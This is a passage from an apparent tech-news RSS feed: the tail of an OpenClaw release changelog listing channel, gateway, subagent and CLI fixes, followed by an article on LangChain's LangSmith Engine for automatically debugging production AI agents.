<li>Telegram: preserve replied-to bot messages, captions, and media metadata in group reply chains so follow-up replies understand what the user is reacting to. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462136761" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82863" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82863/hovercard" href="https://github.com/openclaw/openclaw/pull/82863">#82863</a>)</li>
<li>Providers/Together: update PI runtime packages to 0.74.1 and emit Together-style <code>reasoning.enabled</code>/<code>max_tokens</code> controls for reasoning-capable OpenAI-completions models.</li>
<li>Agents/diagnostics: split slow embedded-run <code>attempt-dispatch</code> startup summaries into workspace, prompt, runtime-plan, and final dispatch subspans so traces identify the delayed setup phase. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4461655494" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82782" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82782/hovercard" href="https://github.com/openclaw/openclaw/issues/82782">#82782</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4461658014" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82783" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82783/hovercard" href="https://github.com/openclaw/openclaw/pull/82783">#82783</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/galiniliev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/galiniliev">@galiniliev</a>.</li>
<li>Agents/Codex: flatten nested tool-result middleware blocks into bounded text so successful message sends are no longer replaced with <code>Tool output unavailable due to post-processing error</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462346626" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82912" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82912/hovercard" href="https://github.com/openclaw/openclaw/issues/82912">#82912</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joeykrug/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joeykrug">@joeykrug</a>.</li>
<li>CLI/media: accept HTTP(S) URLs in <code>openclaw infer image describe --file</code>, fetching remote images through the guarded media path instead of treating URLs as local files. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4461995435" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82837" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82837/hovercard" href="https://github.com/openclaw/openclaw/issues/82837">#82837</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462089264" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82854" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82854/hovercard" href="https://github.com/openclaw/openclaw/pull/82854">#82854</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a>.</li>
<li>Agents/subagents: keep session-backed parent runs active when the child wait call times out before the child session has actually settled, so late subagent completions are reconciled instead of being lost. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4461685397" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82787" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82787/hovercard" href="https://github.com/openclaw/openclaw/issues/82787">#82787</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ramitrkar-hash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ramitrkar-hash">@ramitrkar-hash</a>.</li>
<li>Control UI: advertise shared Gateway protocol constants in browser connect frames, fixing protocol mismatch handshakes after protocol constant drift. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462182289" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82882" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82882/hovercard" href="https://github.com/openclaw/openclaw/issues/82882">#82882</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/galiniliev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/galiniliev">@galiniliev</a>.</li>
<li>Gateway: add rollback protocol-mismatch diagnostics, including client protocol ranges in Gateway logs and deep status/doctor hints for stale client processes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462019039" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82841" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82841/hovercard" href="https://github.com/openclaw/openclaw/issues/82841">#82841</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462327632" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82908" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82908/hovercard" href="https://github.com/openclaw/openclaw/pull/82908">#82908</a>)</li>
<li>Agents/subagents: keep successful keep-mode completion payloads pending after final-delivery retry exhaustion, so requester recovery no longer loses final subagent results. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4459924078" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82583" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82583/hovercard" href="https://github.com/openclaw/openclaw/issues/82583">#82583</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462746689" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82999" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82999/hovercard" href="https://github.com/openclaw/openclaw/pull/82999">#82999</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Gateway/auth: allow same-host trusted-proxy callers to use the documented local direct <code>gateway.auth.password</code> fallback after revisiting the <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4395374595" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/78684" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/78684/hovercard" href="https://github.com/openclaw/openclaw/issues/78684">#78684</a> fail-closed policy, while keeping token fallback rejected and forwarded-header requests on the trusted-proxy path. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4460066638" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82607" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82607/hovercard" href="https://github.com/openclaw/openclaw/issues/82607">#82607</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462463433" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82953" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82953/hovercard" href="https://github.com/openclaw/openclaw/pull/82953">#82953</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Agents/subagents: wait for queued completion handoffs to reach the parent transcript before marking them announced, preventing busy parent runs from cleaning up before observing child results. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462352234" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82913" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82913/hovercard" href="https://github.com/openclaw/openclaw/issues/82913">#82913</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4463073835" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83039" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83039/hovercard" href="https://github.com/openclaw/openclaw/pull/83039">#83039</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Agents/subagents: route group/channel subagent completions through message-tool-only handoffs when required and keep active-requester wake failures from dropping completion delivery. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4461749992" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82803" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82803/hovercard" href="https://github.com/openclaw/openclaw/issues/82803">#82803</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/galiniliev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/galiniliev">@galiniliev</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yozakura-ava/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yozakura-ava">@yozakura-ava</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/moeedahmed/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/moeedahmed">@moeedahmed</a>.</li>
<li>Memory-core: scan persisted memory source sessions on startup, comparing on-disk transcripts against the index and marking only missing/newer/resized files dirty for incremental sync. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4457246662" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82341" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82341/hovercard" href="https://github.com/openclaw/openclaw/pull/82341">#82341</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4457246662" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82341" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82341/hovercard" href="https://github.com/openclaw/openclaw/pull/82341">#82341</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/giodl73-repo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/giodl73-repo">@giodl73-repo</a>.</li>
<li>Telegram: keep the top-level default account in the account list when named accounts or bindings are added alongside top-level credentials, preserving default polling while still letting named-only configs resolve to a single account. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4461704391" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82794" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82794/hovercard" href="https://github.com/openclaw/openclaw/pull/82794">#82794</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4461704391" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82794" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82794/hovercard" href="https://github.com/openclaw/openclaw/pull/82794">#82794</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/giodl73-repo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/giodl73-repo">@giodl73-repo</a>.</li>
<li>CLI/models: reuse command-scoped plugin metadata across model listing, provider catalog, auth, and synthetic-auth checks, restoring fast <code>openclaw models</code> runs for plugin-heavy installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462172294" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82881" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82881/hovercard" href="https://github.com/openclaw/openclaw/issues/82881">#82881</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4463033606" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83033" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83033/hovercard" href="https://github.com/openclaw/openclaw/pull/83033">#83033</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>CLI/channels: show configured official external channels such as Discord in <code>openclaw channels list</code> when their plugin package is missing, including the install and doctor repair command instead of reporting no configured channels. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4461817834" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82813" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82813/hovercard" href="https://github.com/openclaw/openclaw/issues/82813">#82813</a>.</li>
<li>Signal: preserve mixed-case group IDs through routing and session persistence so group auto-replies keep delivering after updates. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4461907881" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82827" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82827/hovercard" href="https://github.com/openclaw/openclaw/issues/82827">#82827</a>.</li>
<li>Agents/tools: keep the <code>message</code> tool available in embedded runs when it is explicitly allowed through <code>tools.alsoAllow</code> or runtime tool allowlists, so channel plugins with custom reply delivery can still use configured message sends. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4461933704" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82833" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82833/hovercard" href="https://github.com/openclaw/openclaw/issues/82833">#82833</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cn1313113/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cn1313113">@cn1313113</a>.</li>
<li>WhatsApp: honor forced document delivery for outbound image, GIF, and video media so <code>forceDocument</code>/<code>asDocument</code> sends preserve original media bytes instead of using compressed media payloads. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4404054047" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/79272" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/79272/hovercard" href="https://github.com/openclaw/openclaw/pull/79272">#79272</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/itsuzef/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/itsuzef">@itsuzef</a>.</li>
<li>WhatsApp: name outbound document attachments from their MIME type when no filename is provided, so PDF and CSV sends arrive as <code>file.pdf</code> and <code>file.csv</code> instead of an extensionless <code>file</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mcaxtr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mcaxtr">@mcaxtr</a>.</li>
<li>Process/diagnostics: report active lane blockers in lane wait warnings so <code>queueAhead=0</code> no longer hides commands waiting behind active work. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4461701202" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82791" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82791/hovercard" href="https://github.com/openclaw/openclaw/issues/82791">#82791</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4461702387" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82792" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82792/hovercard" href="https://github.com/openclaw/openclaw/pull/82792">#82792</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/galiniliev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/galiniliev">@galiniliev</a>.</li>
<li>Process/diagnostics: stop counting the active processing turn as queued backlog in liveness warnings so transient max-only event-loop spikes do not surface as gateway warnings.</li>
<li>Agents/replies: classify provider conversation-state rejections and return a clear message-channel error instead of auto-resetting or falling back to a generic runner failure. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4460117536" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82616" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82616/hovercard" href="https://github.com/openclaw/openclaw/pull/82616">#82616</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dutifulbob/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dutifulbob">@dutifulbob</a>.</li>
<li>Browser plugin: trust managed Chrome CDP diagnostics when launch HTTP probes race cold-start readiness, avoiding false startup failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462309858" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82904" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82904/hovercard" href="https://github.com/openclaw/openclaw/issues/82904">#82904</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462674619" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82986" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82986/hovercard" href="https://github.com/openclaw/openclaw/pull/82986">#82986</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kmanan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kmanan">@kmanan</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Android: prompt before replacing a changed Gateway TLS thumbprint, showing the old and new SHA-256 fingerprints so users can accept expected certificate rotations instead of hard failing on pin mismatch. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4463285677" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83077" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83077/hovercard" href="https://github.com/openclaw/openclaw/pull/83077">#83077</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sliekens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sliekens">@sliekens</a>.</li>
<li>CLI/status: render extra gateway-like service diagnostics as warning/info output instead of error output. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4077671100" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46930" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/46930/hovercard" href="https://github.com/openclaw/openclaw/issues/46930">#46930</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462392789" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82922" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82922/hovercard" href="https://github.com/openclaw/openclaw/pull/82922">#82922</a>) thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/giodl73-repo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/giodl73-repo">@giodl73-repo</a>.</li>
<li>Agents/failover: classify Moonshot/Kimi exhausted-balance HTTP 429 payloads as billing instead of generic rate limits, preserving billing guidance and fallback behavior. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4060463710" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43447" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/43447/hovercard" href="https://github.com/openclaw/openclaw/issues/43447">#43447</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4463292018" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83079" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83079/hovercard" href="https://github.com/openclaw/openclaw/pull/83079">#83079</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/leno23/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/leno23">@leno23</a>.</li>
<li>Plugin SDK: bundle <code>openclaw/plugin-sdk/zod</code> into the published package artifact and verify the packed zod subpath stays self-contained, so pnpm global installs can register plugins without a package-local <code>zod</code> symlink. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4390279612" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/78398" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/78398/hovercard" href="https://github.com/openclaw/openclaw/issues/78398">#78398</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4392386441" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/78515" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/78515/hovercard" href="https://github.com/openclaw/openclaw/pull/78515">#78515</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ggzeng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ggzeng">@ggzeng</a>.</li>
<li>Providers/Google: drop compaction-truncated Gemini thought signatures before replay so malformed Base64 no longer aborts the next assistant turn. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462736082" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82995" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82995/hovercard" href="https://github.com/openclaw/openclaw/pull/82995">#82995</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wAngByg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wAngByg">@wAngByg</a>.</li>
<li>Gateway/mobile: allow paired iOS and Android clients to refresh same-family OS metadata on authenticated reconnect instead of requiring a new approval. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4467055055" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83490" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83490/hovercard" href="https://github.com/openclaw/openclaw/pull/83490">#83490</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ngutman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ngutman">@ngutman</a>.</li>
<li>WhatsApp: treat <code>upload-file</code> as a supported media send intent by lowering path/URL uploads through the channel's normal send-media transport. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4448275851" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/81883" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/81883/hovercard" href="https://github.com/openclaw/openclaw/pull/81883">#81883</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ngutman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ngutman">@ngutman</a>.</li>
<li>iOS: end Live Activities when OpenClaw is connected, idle, or disconnected, and show compact attention states for approval-required reconnects. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4469191547" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83597" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83597/hovercard" href="https://github.com/openclaw/openclaw/pull/83597">#83597</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ngutman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ngutman">@ngutman</a>.</li>
<li>Control UI: hide child nav items when collapsing the active sidebar group. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4051748466" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42167" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42167/hovercard" href="https://github.com/openclaw/openclaw/issues/42167">#42167</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4052169484" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42223" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/42223/hovercard" href="https://github.com/openclaw/openclaw/pull/42223">#42223</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Aroool/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Aroool">@Aroool</a>.</li>
<li>CI/proof: skip the real-behavior-proof gate for private org maintainers by minting a least-privilege (<code>members: read</code>) GitHub App token and checking active membership in the <code>maintainer</code> team, instead of treating <code>author_association=CONTRIBUTOR</code> as definitively external. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4466090722" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83418" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83418/hovercard" href="https://github.com/openclaw/openclaw/pull/83418">#83418</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RomneyDa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RomneyDa">@RomneyDa</a>.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[LangSmith Engine closes the agent debugging loop automatically — but multi-model enterprises still need a neutral layer]]></title>
<description><![CDATA[Enterprises building and deploying agents have a problem: it’s taking their engineers too long to find out that an agent made a mistake, and the loop has continued to perpetuate, especially without a human at every step. LangSmith, the monitoring and evaluation platform from LangChain, launched a...]]></description>
<link>https://tsecurity.de/de/3526823/it-nachrichten/langsmith-engine-closes-the-agent-debugging-loop-automatically-but-multi-model-enterprises-still-need-a-neutral-layer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3526823/it-nachrichten/langsmith-engine-closes-the-agent-debugging-loop-automatically-but-multi-model-enterprises-still-need-a-neutral-layer/</guid>
<pubDate>Mon, 18 May 2026 19:02:33 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Enterprises building and deploying agents have a problem: it’s taking their engineers too long to find out that an agent made a mistake, and the loop has continued to perpetuate, especially without a human at every step. </p><p>LangSmith, the monitoring and evaluation platform from LangChain, launched a new capability in public beta that could make that issue more manageable. <a href="https://www.langchain.com/blog/introducing-langsmith-engine">LangSmith Engine</a> automates the entire chain by detecting production failures, diagnosing root causes against the live codebase, drafting a fix and preventing regression. It does this in a single automated pass. </p><p>LangSmith Engine gives AI engineers a faster path to triage, but it launches into a crowded field: Anthropic, OpenAI and Google are all pulling observability and evaluation <a href="https://venturebeat.com/orchestration/claude-codes-goals-separates-the-agent-that-works-from-the-one-that-decides-its-done">into their own platforms</a>.</p><h2>LangSmith Engine looks at failures</h2><p>LangChain said in a blog post that the typical agent development cycle starts by tracing the agent to understand what it’s doing, followed by identifying gaps, making changes to the prompts and tools, and creating ground-truth datasets. Developers then run experiments and check for regressions before shipping the agent. </p><p>The problem is that customers often run into issues when the trace review doesn’t surface faulty patterns, error repetition gets difficult to see, and there’s no targeted evaluator to catch the same problem when it repeats in production.</p><p>LangSmith Engine works by monitoring production traces for several signal types, “explicit errors, online evaluator failures, trace anomalies, negative user feedback and unusual behaviors like user asking questions the agent wasn’t built to answer,” according to the blog post.</p><p>Engine will then read the live codebase, find the culprit and draft a pull request before proposing a custom evaluator for that specific failure pattern. The human comes in at the approval step. </p><p>It’s built on top of LangSmith’s existing tracing and evaluation infrastructure and also works with an enterprise’s evaluator results. </p><p>Unlike observability tools such as Weights &amp; Biases, Arize Phoenix and Honeyhive, LangSmith Engine takes the entire chain automatically — detecting the failure, diagnosing root cause, drafting a fix — and brings the human in only at the approval step.</p><h2>Model providers bringing evaluators in platform</h2><p>While LangSmith identified this evaluation loop as a need for many enterprises, Engine comes at a time where the larger providers are beginning to offer observability tools within their platform. This means enterprises may choose to use an end-to-end platform rather than add LangSmith Engine onto their existing workflows. </p><p><a href="https://venturebeat.com/orchestration/anthropic-wants-to-own-your-agents-memory-evals-and-orchestration-and-that-should-make-enterprises-nervous">Anthropic's Claude Managed Agents</a> brings together agentic deployment, evaluation and orchestration into a single suite. <a href="https://venturebeat.com/orchestration/openai-launches-centralized-agent-platform-as-enterprises-push-for-multi">OpenAI's Frontier</a> offers a similar end-to-end platform for building, governing and evaluating enterprise agents — though both have faced questions from enterprises wary of committing to a single vendor.</p><p>However, practitioners point out that not everyone wants to bring evaluations and observability fully into one platform.</p><p>Leigh Coney, founder and principal consultant at Workwise Solutions, told VentureBeat that third-party observability is the default for many enterprises. </p><p>“One fund I work with runs Claude for analysis and GPT for a separate workflow. If observability lives inside each provider's tooling, you now have two systems that can't talk to each other. Your compliance team can't produce a unified audit trail,” he said. “So third-party observability is surviving because multi-model is already the default in enterprise, and somebody has to sit across providers.”</p><p>Jessica Arredondo Murphy, CEO and co-founder of True Fit, said independent platforms like LangSmith have to prove to enterprises that they can "answer the long-term question of whether they become the cross-model operating layer for quality and reliability.”</p><p>“Enterprises are not consolidating onto the first-party model provider tooling as quickly as the model providers would prefer. What I see is a pragmatic split: teams will use first-party tooling for fast onboarding and early-stage debugging, but as soon as they care about production reliability, governance, and long-term flexibility, they tend to introduce a more neutral layer for observability and evaluation,” she said. </p><p>LangSmith Engine is available now in public beta. Teams can connect a tracing project, optionally connect their repo, and Engine will begin surfacing issues from production traces automatically.<!-- -->
</p>]]></content:encoded>
</item>
<item>
